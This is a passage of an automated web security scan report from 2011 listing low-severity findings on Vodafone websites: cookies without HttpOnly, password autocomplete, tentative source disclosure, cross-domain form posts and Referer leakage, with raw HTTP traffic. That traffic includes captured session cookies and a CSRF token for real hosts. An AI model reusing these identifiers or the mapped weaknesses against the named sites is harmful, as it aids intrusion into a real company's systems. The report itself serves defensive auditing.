The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.34. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.35. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/misclinks.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/misclinks.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.36. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.37. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchinpututil.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/searchinpututil.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.38. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1442842890.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.39. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/sidelinks.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/sidelinks.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.40. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/templateutils.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/templateutils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.41. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.42. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.43. https://help.vodafone.co.uk/system/web/widget/platform/util/util.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/widget/platform/util/util.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5. Password field with autocomplete enabled previous next
There are 6 instances of this issue:

http://enterprise.vodafone.com/home/
http://forum.vodafone.co.uk/
http://forum.vodafone.co.uk/t5/Apple/bd-p/72
http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50
http://forum.vodafone.co.uk/t5/HTC/bd-p/htc
http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

5.1. http://enterprise.vodafone.com/home/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/home/

Issue detail

The page contains a form with the following action URL:

https://sso-enterprisecentral.vodafone.com/vgee/login.do?realm=enterprisecentral&goto=https%3A%2F%2Fenterprisecentral.vodafone.com%3A443%2Fvgee%2F

The form contains the following password field with autocomplete enabled:

IDToken2

Request

GET /home/ HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:26:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 63180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="dropdown-wrapper">
<form id="account" action="https://sso-enterprisecentral.vodafone.com/vgee/login.do?realm=enterprisecentral&goto=https%3A%2F%2Fenterprisecentral.vodafone.com%3A443%2Fvgee%2F" method="post" class="login" onSubmit="click(this)">
<input type="hidden" name="userAction" value="login">
...[SNIP]...
<br clear="all" />
<input type="password" name="IDToken2" id="pwd" value="" onfocus="txt2pwd(document.getElementById('txt'), 'pwd')" onBlur="pwd2txt(this, 'txt')" tabindex="1002"/>
<input type="text" id="txt" value="Type in your password" onClick="txt2pwd(this, 'pwd')" tabindex="1003" />
...[SNIP]...

5.2. http://forum.vodafone.co.uk/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.3. http://forum.vodafone.co.uk/t5/Apple/bd-p/72 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Apple/bd-p/72

Issue detail

The page contains a form with the following action URL:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field with autocomplete enabled:

password

Request

GET /t5/Apple/bd-p/72 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.4. http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/BlackBerry/bd-p/50

Issue detail

The page contains a form with the following action URL:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field with autocomplete enabled:

password

Request

GET /t5/BlackBerry/bd-p/50 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.5. http://forum.vodafone.co.uk/t5/HTC/bd-p/htc previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/HTC/bd-p/htc

Issue detail

The page contains a form with the following action URL:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field with autocomplete enabled:

password

Request

GET /t5/HTC/bd-p/htc HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.6. http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Vodafone-Sure-Signal/bd-p/70

Issue detail

The page contains a form with the following action URL:

http://forum.vodafone.co.uk/t5/components/componentdisplaycontributionpage.userloginform.form.form.form

The form contains the following password field with autocomplete enabled:

password

Request

GET /t5/Vodafone-Sure-Signal/bd-p/70 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6. Source code disclosure previous next
There are 2 instances of this issue:

http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

6.1. http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /system/web/view/selfservice/templates/vodafone/usefulitemsutil.js HTTP/1.1
Host: help.vodafone.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=STARTPAGEFRAMELESS&CONFIGURATION=1058&PARTITION_ID=1&USERTYPE=1&LANGUAGE=en&COUNTRY=US&TIMEZONE_OFFSET=-3600000
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2763522B851D1864-60000107601A8EC3[CE]; mbox=session#1321641039287-389573#1321643548|PC#1321641039287-389573.19#1322851288|check#true#1321641748; s_pers=%20s_lastvisit%3D1321641041755%7C1416249041755%3B%20s_vnum%3D1324233041761%2526vn%253D1%7C1324233041761%3B%20dl%3D1%7C1321643488458%3B%20s_nr%3D1321641688464%7C1324233688464%3B%20s_invisit%3Dtrue%7C1321643488482%3B%20gpv_p32%3DUK%253ABrands%253AiPhone%253APaymonthlyiPhone%7C1321643488487%3B; s_sv_122_s1=1@16@a//1321641043212; s_sv_122_p1=1@49@d/25246/25245/25244/25243&s/25247/19337/26945&e/9; s_sess=%20s_sv_sid%3D709713783754%3B%20ev1%3Dg3%2520internet%2520web%2520surfing%3B%20s_scount%3D2%3B%20s_stack%3D1%253Apress%2520relese%2520contact%257C2%253Ag3%2520internet%2520web%2520surfing%3B%20s_cc%3Dtrue%3B%20s_cmrun%3D1%3B%20s_sq%3D%3B%20s_ppv%3D50%3B; eGain_eService_JSESSIONID=5r21TGnQkQwnXlP6wnYsGVnVnhH7JQS4Cp4sGK5sqGD3YHm0yKL8!-1484610483; web_templates_personalization_cookie#1058#1=; BIGipServerpool_ems00820ss=721422602.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1504
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:20 GMT
Accept-Ranges: bytes
ETag: "0c62b3e5bafc81:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:42:40 GMT

function viewArticle(articleId, configurationId, partitionId)
{
   var isOpenNewWindow = document.viewUsefulItemForm.ArticleInNewWindow.value;
   document.viewUsefulItemForm.USEFUL_ITEM.value = "USEFUL_ITEM";
   if(isOpenNewWindow == 2)
   {
       //adding a string to maintain a ref. for view article
       var theURL = '<%= getFormAction(request)%>' + "?CMD=VIEW_ARTICLE&ARTICLE_ID="+articleId + "&USEFUL_ITEM=USEFUL_ITEM";
       theURL = theURL + "&CONFIGURATION=" + configurationId + "&PARTITION_ID=" + partitionId;
       var randomNumber=Math.floor(Mat
...[SNIP]...

6.2. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /system/web/view/selfservice/templates/vodafone/usefulitemsutil.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1504
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:20 GMT
Accept-Ranges: bytes
ETag: "0c62b3e5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

function viewArticle(articleId, configurationId, partitionId)
{
   var isOpenNewWindow = document.viewUsefulItemForm.ArticleInNewWindow.value;
   document.viewUsefulItemForm.USEFUL_ITEM.value = "USEFUL_ITEM";
   if(isOpenNewWindow == 2)
   {
       //adding a string to maintain a ref. for view article
       var theURL = '<%= getFormAction(request)%>' + "?CMD=VIEW_ARTICLE&ARTICLE_ID="+articleId + "&USEFUL_ITEM=USEFUL_ITEM";
       theURL = theURL + "&CONFIGURATION=" + configurationId + "&PARTITION_ID=" + partitionId;
       var randomNumber=Math.floor(Mat
...[SNIP]...

7. Cross-domain POST previous next
There are 2 instances of this issue:

/products_solutions/industry/financial-services.jsp
/products_solutions/industry/financial-services.jsp

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

7.1. http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/industry/financial-services.jsp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

doc_name
elqFormName
elqSiteID
redir_url
C_SFDCLastCampaignID
C_FirstName
C_LastName
C_EmailAddress
C_Company
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
C_Country
newsletter_optin
submit

Request

GET /products_solutions/industry/financial-services.jsp HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_p7=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; __utmb=112384592; s_cc=true; s_nr=1321640849543; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dinsight_news%25253A2011-11-04-fixed-mobile-convergence%2525u2013the-first-step-in-a-unified-communications-strategy%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/products_solutions/industry/financial-services.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 94421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<div class="showhide" style="display:none">
<form name="gf_long" id="gf_long" onsubmit='return submitForm(this);' action="http://now.eloqua.com/e/f2.aspx" method="post">
<input type="hidden" name="doc_name" id="doc_name" value="">
...[SNIP]...

7.2. http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/products_solutions/industry/financial-services.jsp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

elqFormName
elqSiteID
elqCustomerGUID
C_EmailAddress
doc_id
doc_name
redir_url
C_SFDCLastCampaignID
Source

Request

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 94421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<br class="clear" />
<form name="gf_hidden" id="gf_hidden" action="http://now.eloqua.com/e/f2.aspx"
method="post">
<input type="hidden" name="elqFormName" value="gf_hidden">
...[SNIP]...

8. Cross-domain Referer leakage previous next
There are 10 instances of this issue:

http://enterprise.vodafone.com/newsItem/search
https://freesim.vodafone.co.uk/orders/add
https://freesim.vodafone.co.uk/packages/index
http://help.vodafone.co.uk/system/selfservice.controller
http://help.vodafone.co.uk/system/selfservice.controller
http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js
https://help.vodafone.co.uk/system/selfservice.controller
http://online.vodafone.co.uk/dispatch/Portal/appmanager/vodafone/wrp
http://troubleshootinghelp.vodafone.co.uk/start
http://troubleshootinghelp.vodafone.co.uk/system/selfservice.controller

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

8.1. http://enterprise.vodafone.com/newsItem/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The page was loaded from a URL containing a query string:

http://enterprise.vodafone.com/newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=&keyword=

The response contains the following links to other domains:

http://twitter.com/Vodafone_VGE
http://www.linkedin.com/companies/vodafone-global-enterprise
http://www.youtube.com/VodafoneVGE

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=&keyword= HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:02 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 100396

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<area shape="rect" coords="6,5,22,21" href="http://enterprise.vodafone.com/global/rss/news_feed.xml" target="_blank" alt="rss" />
<area shape="rect" coords="28,3,47,22" href="http://twitter.com/Vodafone_VGE" target="_blank" alt="twitter" />
<area shape="rect" coords="53,3,71,23" href="http://www.linkedin.com/companies/vodafone-global-enterprise" target="_blank" alt="linked in" />
<area shape="rect" coords="74,4,94,24" href="/user/NewsletterRegistration.jsp" alt="newsletter" />
<area shape="rect" coords="97,4,118,22" href="http://www.youtube.com/VodafoneVGE" target="_blank" alt="you Tube" />
</map>
...[SNIP]...

8.2. https://freesim.vodafone.co.uk/orders/add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/orders/add

Issue detail

The page was loaded from a URL containing a query string:

https://freesim.vodafone.co.uk/orders/add?package_id=4&tracker=y9v09n&keyword=weekend&icmp=int-vod-frbee-frwend-cta

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://c411930.ssl.cf3.rackcdn.com/css/jquery.fancybox-1.3.4.css
https://c411930.ssl.cf3.rackcdn.com/css/screen.css
https://c411930.ssl.cf3.rackcdn.com/css/vodafone_co_uk.css
https://c411930.ssl.cf3.rackcdn.com/images/interface/icon_sim-large.gif
https://c411930.ssl.cf3.rackcdn.com/images/interface/icon_sim-small.gif
https://c411930.ssl.cf3.rackcdn.com/js/lib/fancybox/jquery.fancybox-1.3.4.pack.js
https://c411930.ssl.cf3.rackcdn.com/js/lib/modernizr-1.6.min.js
https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lib_validator_orders_countries.min.js
https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lightbox.js
https://secure.img-cdn.mediaplex.com/0/18329/universal.html?page_name=proposition_page&Proposition_Page=1&mpuid=weekend
https://vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0

Request

GET /orders/add?package_id=4&tracker=y9v09n&keyword=weekend&icmp=int-vod-frbee-frwend-cta HTTP/1.1
Host: freesim.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.8
Set-Cookie: ci_csrf_token=7870c0f0081628b5a68af651bb5889e8; expires=Fri, 18-Nov-2011 20:42:10 GMT; path=/
